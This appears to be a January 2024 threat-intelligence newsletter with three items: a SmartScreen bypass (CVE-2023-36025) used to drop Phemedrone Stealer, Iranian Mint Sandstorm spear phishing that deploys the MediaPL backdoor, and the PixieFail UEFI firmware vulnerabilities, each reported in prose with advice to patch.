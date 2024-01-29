Ransomware/Malware Activity

Vulnerability Exploited to Drop Phemedrone Stealer in Targeted Browsers, Crypto Wallets, and Messaging Apps

Threat actors have been observed utilizing CVE-2023-36025, a bypass vulnerability for Windows SmartScreen, to deliver the open-source malware Phemedrone Stealer. Phemedrone Stealer is an information stealer malware that targets web browsers, messaging applications like Telegram and Discord, and cryptocurrency wallets. Once the data is compromised, it is returned to the threat actors through Telegram and their command-and-control (C2) server infrastructure. Phemedrone is deployed using CVE-2023-36025, a vulnerability that involves tricking the victim into clicking on a .URL file that has been shortened and masked with URL shorteners and then posted to the messaging app. After clicking the malicious link, the .URL file connects to the threat actor's C2 server before executing a control panel file that takes advantage of CVE-2023-36025 to call rundll32.exe. This DLL uses Windows PowerShell to download a shellcode loader that executes the Phemedrone Stealer malware. According to Trend Micro, Phemedrone Stealer can target the following pieces of data: Chromium browser, cryptocurrency wallets, system information for the infected device, Telegram, and Gecko browsers (IE Firefox). This campaign has been seen still utilizing CVE-2023-36025 despite the vulnerability having been patched by Microsoft in November 2023, demonstrating how important it is to keep your systems up to date to avoid exploitation of known CVEs. CTIX analysts will continue to monitor the development of Phemedrone Stealer.

Threat Actor Activity

Iranian Hackers Use Adept Social Engineering Skills to Gather War-Related Intelligence

A technically and operationally mature subgroup of the Iranian cyber espionage group called Mint Sandstorm has been targeting high-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the US. Mint Sandstorm (a.k.a. APT35/Charming Kitten/PHOSPHORUS) has been linked to the Islamic Revolutionary Guard Corps (IRGC), and operators within the subgroup are known for their patience and skillful social engineering mastery that often lacks the identifiers present in most phishing emails. The recent activity associated with a subgroup of Mint Sandstorm has been on-going since November 2023. The Iranian-backed state hackers are using custom spear phishing lures centered around the Israel-Palestine war, disguising themselves as journalists or other high-profile individuals and exchanging email communications with targets to build trust, and in some cases have used legitimate compromised email accounts of the individuals they were impersonating. The emails sent to targets requested input about articles relating to the Israel-Palestine conflict, and the hackers sent links to a malicious ".rar" file that was supposed to contain the alleged documents or related articles. In some cases, researchers have uncovered the use of a custom backdoor called MediaPL which is disguised as Windows Media Player to evade detection and is a form of malware that uses encrypted communication channels to exchange information with its designated command-and-control (C2) server. MediaPL and another backdoor, MischiefTut, can be used to launch commands received from the C2 server, run reconnaissance commands, and download additional tools to maintain access in a compromised environment and continuously evade detection. Based on the Israel-Palestine related lures and the targeting of individuals potentially within the intelligence and policy communities, this campaign is likely being used to gather information and perspective on events related to the war from a range of individuals.

Vulnerabilities

Nine Vulnerabilities Known as PixieFail Expose Millions of Computers to Exploitation

Cybersecurity researchers identified a range of nine (9) vulnerabilities collectively tracked as PixieFail in the IPv6 network protocol stack (NetworkPkg) of TianoCore's EDK II, an open-source implementation of UEFI. UEFI is the low-level and complex chain of firmware responsible for booting up modern computers. These vulnerabilities, ranging from integer underflows to weak pseudorandom number generators, affect the firmware's networking modules, particularly the PXE booting process, and can be exploited within local networks and, in some scenarios, remotely. These flaws pose significant risks for attacks, including remote code execution (RCE), denial-of-service (DoS), information leakage, and network session hijacking. The CERT Coordination Center (CERT/CC) has published an advisory with guidance for affected vendors, detailing what actions should be taken to prevent exploitation. These include applying updates to the latest stable version of UEFI firmware, as well as other manual configuration techniques, like disabling PXE boot if it is not used or supported in a computing environment. CTIX analysts recommend that all affected individuals ensure they are running the most secure version of UEFI firmware.

